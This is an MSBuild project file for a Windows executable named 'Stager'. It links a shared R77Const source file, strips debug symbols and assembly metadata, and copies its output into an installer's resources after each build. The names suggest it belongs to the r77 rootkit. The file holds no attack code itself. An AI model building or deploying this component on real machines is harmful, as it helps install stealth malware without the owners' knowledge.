<Project Sdk="Microsoft.NET.Sdk">
	<PropertyGroup>
		<OutputType>WinExe</OutputType>
		<TargetFramework>net3.5</TargetFramework>
		<AllowUnsafeBlocks>True</AllowUnsafeBlocks>
		<Prefer32Bit>false</Prefer32Bit>
		<DebugType>none</DebugType>
		<DebugSymbols>false</DebugSymbols>
		<GenerateAssemblyInfo>false</GenerateAssemblyInfo>
		<GenerateTargetFrameworkAttribute>false</GenerateTargetFrameworkAttribute>
		<Win32Resource>Stager.res</Win32Resource>
	</PropertyGroup>
	<ItemGroup>
		<Compile Include="..\Global\R77Const.cs" Link="Properties\R77Const.cs" />
	</ItemGroup>
	<ItemGroup>
		<Compile Update="Properties\Resources.Designer.cs">
			<DesignTime>True</DesignTime>
			<AutoGen>True</AutoGen>
			<DependentUpon>Resources.resx</DependentUpon>
		</Compile>
		<EmbeddedResource Update="Properties\Resources.resx">
			<Generator>ResXFileCodeGenerator</Generator>
			<LastGenOutput>Resources.Designer.cs</LastGenOutput>
		</EmbeddedResource>
	</ItemGroup>
	<Target Name="PostBuild" AfterTargets="PostBuildEvent">
		<Exec Command="xcopy /Y &quot;$(TargetPath)&quot; &quot;$(SolutionDir)Install\Resources&quot;" />
	</Target>
</Project>